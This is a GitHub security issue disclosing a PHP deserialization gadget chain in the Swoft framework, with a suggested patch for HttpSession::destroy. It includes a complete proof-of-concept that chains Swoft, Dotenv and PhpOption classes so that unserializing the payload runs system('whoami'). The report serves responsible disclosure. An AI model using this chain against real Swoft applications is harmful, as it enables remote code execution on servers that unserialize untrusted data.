Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

A gadget chain of the deserialization vulnerability in latest Swoft #1506

Open
CyanM0un opened this issue Sep 1, 2023 · 0 comments
Open

A gadget chain of the deserialization vulnerability in latest Swoft #1506

CyanM0un opened this issue Sep 1, 2023 · 0 comments
Assignees
@inhere @sakuraovq
Labels
swoft: db Issues for swoft db component swoft: event

Comments

@CyanM0un
Copy link

CyanM0un commented Sep 1, 2023

Q A
Security report? yes

Details
The website swoft.io doesn't work so I report the gadget chain here, which could lead to RCE when deserializing untrusted data. The testing files are listed below:

<?php
// payload.php
namespace Swoft\Session
{
    class SwooleStorage
    {
        private $db;

        function __construct($function, $parameter)
        {
            $this->db = new \Swoft\Http\Session\HttpSession($function, $parameter);
        }
    }
}

namespace Swoft\Http\Session
{
    class HttpSession
    {
        private $handler;
        private $sessionId;

        function __construct($function, $parameter)
        {
            $this->sessionId = 'x';
            $this->handler = new \Swoft\Console\Style\Style($function, $parameter);
        }
    }
}

namespace Swoft\Console\Style
{
    class Style
    {
        private $styles;
        
        function __construct($function, $parameter)
        {
            $this->styles = new \Dotenv\Environment\DotenvVariables($function, $parameter);
        }
    }
}

namespace Dotenv\Environment
{
    class DotenvVariables
    {
        protected $adapters;

        function __construct($function, $parameter)
        {
            $this->adapters = new \PhpOption\LazyOption($function, $parameter);
        }
    }
}

namespace PhpOption
{
    class LazyOption
    {
        private $callback;
        private $arguments;

        function __construct($function, $parameter)
        {
            $this->callback = $function;
            $this->arguments = [$parameter];
        }
    }
}

namespace
{
    echo urlencode(serialize(new \Swoft\Session\SwooleStorage("system", "whoami")));
}
//index.php in Swotf directory
<?php
include_once __DIR__ . "/vendor/autoload.php";
unserialize(urldecode($poc));

Advice
I am wondering about adding a patch below in class Swoft\Http\Session\HttpSession may help prevent the gadget chain execution:

public function destroy(): bool
{
    $this->data   = [];
    $this->closed = true;
    if (!method_exists($this->handler,'destroy')) {die();}
    return $this->handler->destroy($this->sessionId);
}
@github-actions github-actions bot added the swoft: db Issues for swoft db component label Sep 1, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@inhere inhere

@sakuraovq sakuraovq

Labels
swoft: db Issues for swoft db component swoft: event
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@inhere @sakuraovq @CyanM0un